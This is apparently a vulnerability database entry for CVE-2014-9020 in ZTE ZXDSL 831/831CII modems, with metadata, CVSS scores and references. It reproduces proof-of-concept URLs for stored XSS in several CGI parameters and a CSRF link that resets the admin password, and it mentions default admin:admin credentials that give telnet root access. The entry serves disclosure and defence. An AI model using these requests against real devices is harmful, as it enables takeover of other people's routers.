VAR-201411-0114
Vulnerability from variot - Updated: 2023-12-18 12:38Cross-site scripting (XSS) vulnerability in the Quick Stats page (psilan.cgi) in ZTE ZXDSL 831 and 831CII allows remote attackers to inject arbitrary web script or HTML via the domainname parameter in a save action. NOTE: this issue was SPLIT from CVE-2014-9021 per ADT1 due to different affected products and codebases. The ZTE 831CII is a router device. ZTE 831CII has HTML injection, cross-site request forgery, clickjacking, information disclosure, and unauthorized access vulnerabilities, allowing remote attackers to perform certain administrative operations, execute arbitrary scripts or HTML code in the browser context, or steal cookie-based authentication certificates. ZTE 831CII is prone to the following security vulnerabilities: 1. An HTML-injection vulnerability 2. A cross-site request-forgery vulnerability 3. An unspecified clickjacking vulnerability 4. An information-disclosure vulnerability 5. Other attacks are also possible. Both ZTE ZXDSL 831 and 831CII are ADSL modem (Modem) products of China ZTE Corporation. Hardcoded default misconfiguration - The modem comes with admin:admin user credintials.
Stored XSS - http://192.168.1.1/psilan.cgi?action=saveðIpAddress=192.168.1.1ðSubnetMask=255.255.255.0&hostname=ZXDSL83C1II&domainname=home%27;alert%280%29;//&enblUpnp=1&enblLan2=0 Any user browsing to http://192.168.1.1/main.html will have a stored xss executed!
CSRF based Stored XSS - http://192.168.1.1/adminpasswd.cgi?action=save&sysUserName=%27;alert%280%29;//&sysPassword=37F6E6F627B6 - letting an admin visit this link would result the admin username changed to ';alert(0);// also a stored XSS in the home page.
CSRF - there is no token/capcha or even current password prompt when the admin changes the password, and creditintials are sent over GET. PoC: http://192.168.1.1/adminpasswd.cgi?action=save&sysUserName=admin&sysPassword=F6C656269697 if an authenticated admin browses that link their credintials will become admin:yibelo
UI Redressing - The modem (like most modems) does not have a clickjacking protection. thus, can be used to modify settings, override admin accounts by a simple clickjack. forexample by using http://192.168.1.1/adminpasswd.html it is possible into tricking an admin submit a form with our credintials (since it doesn't require current password)
not using SSL - The modem does not use HTTPS, so anyone can use MiTM to sniff on going actions, possibly gain user credintials.
Unrestricted privileges - anyone who is connected to the modem with Telnet or tftp is root. simply telneting and authenticating as admin:admin and typing sh and echo $USER would prove that. # Exploit Title: ZTE ZXDSL 831 Multiple Cross Site Scripting
Date: 11/3/2014
Exploit Author: Paulos Yibelo
Vendor Homepage: zte.com.cn
Software Link: -
Version: -
Tested on: Windows 7
CVE :-
TR-069 Client page: Stored
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0114",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zxdsl 831cii",
"scope": "eq",
"trust": 1.6,
"vendor": "zte",
"version": null
},
{
"model": "zxdsl 831",
"scope": "eq",
"trust": 1.6,
"vendor": "zte",
"version": null
},
{
"model": "zxdsl 831",
"scope": null,
"trust": 0.8,
"vendor": "zte",
"version": null
},
{
"model": "zxdsl 831cii",
"scope": null,
"trust": 0.8,
"vendor": "zte",
"version": null
},
{
"model": "831cii",
"scope": null,
"trust": 0.6,
"vendor": "zte",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"db": "NVD",
"id": "CVE-2014-9020"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zte:zxdsl_831cii:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:zte:zxdsl_831:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-9020"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "habte.yibelo",
"sources": [
{
"db": "BID",
"id": "70984"
}
],
"trust": 0.3
},
"cve": "CVE-2014-9020",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2014-9020",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-08309",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-76965",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-9020",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2014-08309",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201411-377",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-76965",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"db": "VULHUB",
"id": "VHN-76965"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"db": "NVD",
"id": "CVE-2014-9020"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in the Quick Stats page (psilan.cgi) in ZTE ZXDSL 831 and 831CII allows remote attackers to inject arbitrary web script or HTML via the domainname parameter in a save action. NOTE: this issue was SPLIT from CVE-2014-9021 per ADT1 due to different affected products and codebases. The ZTE 831CII is a router device. ZTE 831CII has HTML injection, cross-site request forgery, clickjacking, information disclosure, and unauthorized access vulnerabilities, allowing remote attackers to perform certain administrative operations, execute arbitrary scripts or HTML code in the browser context, or steal cookie-based authentication certificates. ZTE 831CII is prone to the following security vulnerabilities:\n1. An HTML-injection vulnerability\n2. A cross-site request-forgery vulnerability\n3. An unspecified clickjacking vulnerability\n4. An information-disclosure vulnerability\n5. Other attacks are also possible. Both ZTE ZXDSL 831 and 831CII are ADSL modem (Modem) products of China ZTE Corporation. Hardcoded default misconfiguration - The modem comes with admin:admin user credintials. \n\nStored XSS - http://192.168.1.1/psilan.cgi?action=save\u0026ethIpAddress=192.168.1.1\u0026ethSubnetMask=255.255.255.0\u0026hostname=ZXDSL83C1II\u0026domainname=home%27;alert%280%29;//\u0026enblUpnp=1\u0026enblLan2=0\nAny user browsing to http://192.168.1.1/main.html will have a stored xss executed!\n\nCSRF based Stored XSS - http://192.168.1.1/adminpasswd.cgi?action=save\u0026sysUserName=%27;alert%280%29;//\u0026sysPassword=37F6E6F627B6 - letting an admin visit this link would result the admin username changed to \u0027;alert(0);// also a stored XSS in the home page. \n\nCSRF - there is no token/capcha or even current password prompt when the admin changes the password, and creditintials are sent over GET. PoC: http://192.168.1.1/adminpasswd.cgi?action=save\u0026sysUserName=admin\u0026sysPassword=F6C656269697\nif an authenticated admin browses that link their credintials will become admin:yibelo\n\nUI Redressing - The modem (like most modems) does not have a clickjacking protection. thus, can be used to modify settings, override admin accounts by a simple clickjack. forexample by using http://192.168.1.1/adminpasswd.html it is possible into tricking an admin submit a form with our credintials (since it doesn\u0027t require current password)\n\nnot using SSL - The modem does not use HTTPS, so anyone can use MiTM to sniff on going actions, possibly gain user credintials. \n\nUnrestricted privileges - anyone who is connected to the modem with Telnet or tftp is root. simply telneting and authenticating as admin:admin and typing sh and echo $USER would prove that. # Exploit Title: ZTE ZXDSL 831 Multiple Cross Site Scripting\n# Date: 11/3/2014\n# Exploit Author: Paulos Yibelo\n# Vendor Homepage: zte.com.cn\n# Software Link: -\n# Version: -\n# Tested on: Windows 7\n# CVE :-\n\nTR-069 Client page: Stored",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-9020"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"db": "BID",
"id": "70984"
},
{
"db": "VULHUB",
"id": "VHN-76965"
},
{
"db": "PACKETSTORM",
"id": "129016"
},
{
"db": "PACKETSTORM",
"id": "129017"
}
],
"trust": 2.7
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-9020",
"trust": 3.6
},
{
"db": "BID",
"id": "70984",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "129017",
"trust": 1.8
},
{
"db": "PACKETSTORM",
"id": "129016",
"trust": 1.8
},
{
"db": "BID",
"id": "70985",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005571",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201411-377",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-08309",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20141106 ZTE 831CII MULTIPLE VULNERABLITIES",
"trust": 0.6
},
{
"db": "XF",
"id": "98584",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-76965",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"db": "VULHUB",
"id": "VHN-76965"
},
{
"db": "BID",
"id": "70984"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"db": "PACKETSTORM",
"id": "129016"
},
{
"db": "PACKETSTORM",
"id": "129017"
},
{
"db": "NVD",
"id": "CVE-2014-9020"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
]
},
"id": "VAR-201411-0114",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"db": "VULHUB",
"id": "VHN-76965"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-08309"
}
]
},
"last_update_date": "2023-12-18T12:38:08.552000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://wwwen.zte.com.cn/en/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76965"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"db": "NVD",
"id": "CVE-2014-9020"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/70984"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/70985"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/129016/zte-831cii-hardcoded-credential-xss-csrf.html"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/129017/zte-zxdsl-831-cross-site-scripting.html"
},
{
"trust": 1.4,
"url": "http://www.securityfocus.com/archive/1/archive/1/533930/100/0/threaded"
},
{
"trust": 1.4,
"url": "http://www.securityfocus.com/archive/1/archive/1/533931/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/533930/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/533931/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98584"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9020"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-9020"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/70984/"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/98584"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/psilan.cgi?action=save\u0026ethipaddress=192.168.1.1\u0026ethsubnetmask=255.255.255.0\u0026hostname=zxdsl83c1ii\u0026domainname=home%27;alert%280%29;//\u0026enblupnp=1\u0026enbllan2=0"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9020"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9183"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/adminpasswd.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9019"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/main.html"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/adminpasswd.cgi?action=save\u0026sysusername=%27;alert%280%29;//\u0026syspassword=37f6e6f627b6"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/adminpasswd.cgi?action=save\u0026sysusername=admin\u0026syspassword=f6c656269697"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/tr69cfg.cgi?tr69cinformenable=1\u0026tr69cinforminterval=43200\u0026tr69cacsurl=http://acs.site.et:9090/web/tr069\u0026tr69cacsuser=cpe\u0026tr69cacspwd=cpe\u0026tr69cconnrequser=itms\u0026tr69cconnreqpwd=itms%27;alert%280%29;//\u0026tr69cnoneconnreqauth=0\u0026tr69cdebugenable=0%27;alert%280%29;//"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/tr69cfg.html"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/tr69cfg.cgi?tr69cinformenable=1\u0026tr69cinforminterval=43200\u0026tr69cacsurl=http://acs.site.et:9090/web/tr069\u0026tr69cacsuser=cpe%27;alert%280%29;//\u0026tr69cacspwd=cpe\u0026tr69cconnrequser=itms\u0026tr69cconnreqpwd=itms\u0026tr69cnoneconnreqauth=0\u0026tr69cdebugenable=0"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/tr69cfg.cgi?tr69cinformenable=1\u0026tr69cinforminterval=43200\u0026tr69cacsurl=http://acs.etc.et:9090/web/tr069%27;alert%280%29;//\u0026tr69cacsuser=cpe\u0026tr69cacspwd=cpe\u0026tr69cconnrequser=itms\u0026tr69cconnreqpwd=itms\u0026tr69cnoneconnreqauth=0\u0026tr69cdebugenable=0"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/tr69cfg.cgi?tr69cinformenable=1\u0026tr69cinforminterval=43200\u0026tr69cacsurl=http://acs.site.et:9090/web/tr069\u0026tr69cacsuser=cpe\u0026tr69cacspwd=cpe%27;alert%280%29;//\u0026tr69cconnrequser=itms\u0026tr69cconnreqpwd=itms\u0026tr69cnoneconnreqauth=0\u0026tr69cdebugenable=0"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9021"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/sntpcfg.sntp?ntp_enabled=0\u0026tmyear=2000%27lol\u0026tmmonth=01\u0026tmday=01\u0026tmhour=00\u0026tmminute=30\u0026timezone_offset=+08:00\u0026timezone=beijing,%20chongqing,%20hong%20kong,%20urumqi%22;alert%280%29;//\u0026use_dst=0\u0026enbllightsaving=0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"db": "VULHUB",
"id": "VHN-76965"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"db": "PACKETSTORM",
"id": "129016"
},
{
"db": "PACKETSTORM",
"id": "129017"
},
{
"db": "NVD",
"id": "CVE-2014-9020"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"db": "VULHUB",
"id": "VHN-76965"
},
{
"db": "BID",
"id": "70984"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"db": "PACKETSTORM",
"id": "129016"
},
{
"db": "PACKETSTORM",
"id": "129017"
},
{
"db": "NVD",
"id": "CVE-2014-9020"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"date": "2014-11-20T00:00:00",
"db": "VULHUB",
"id": "VHN-76965"
},
{
"date": "2014-11-06T00:00:00",
"db": "BID",
"id": "70984"
},
{
"date": "2014-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"date": "2014-11-07T16:52:33",
"db": "PACKETSTORM",
"id": "129016"
},
{
"date": "2014-11-07T16:56:04",
"db": "PACKETSTORM",
"id": "129017"
},
{
"date": "2014-11-20T17:50:08.973000",
"db": "NVD",
"id": "CVE-2014-9020"
},
{
"date": "2014-11-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-76965"
},
{
"date": "2014-12-09T00:55:00",
"db": "BID",
"id": "70984"
},
{
"date": "2014-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"date": "2018-10-09T19:54:53.717000",
"db": "NVD",
"id": "CVE-2014-9020"
},
{
"date": "2014-11-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZTE ZXDSL 831 and 831CII of Quick Stats Page cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "129017"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
],
"trust": 0.7
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…